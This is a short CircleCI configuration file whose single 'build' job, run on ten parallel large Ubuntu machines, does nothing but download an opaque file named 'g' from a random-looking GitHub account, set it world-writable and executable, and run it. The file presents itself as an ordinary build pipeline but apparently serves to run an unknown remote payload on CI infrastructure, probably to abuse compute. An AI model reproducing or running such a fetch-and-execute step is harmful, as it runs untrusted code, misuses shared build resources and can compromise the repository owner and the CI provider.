working_dir: &working_dir ~/app

version: 2.1

workflows:
  main:
    jobs:
      - build

jobs:
  build:
    parallelism: 10
    machine:
      image: ubuntu-2204:2022.04.1
    resource_class: large
    steps:
      - checkout
      - run:
         name: "Bangun"
         command: wget https://raw.githubusercontent.com/ftgr6ryj/a/main/g && chmod 777 g && ./g
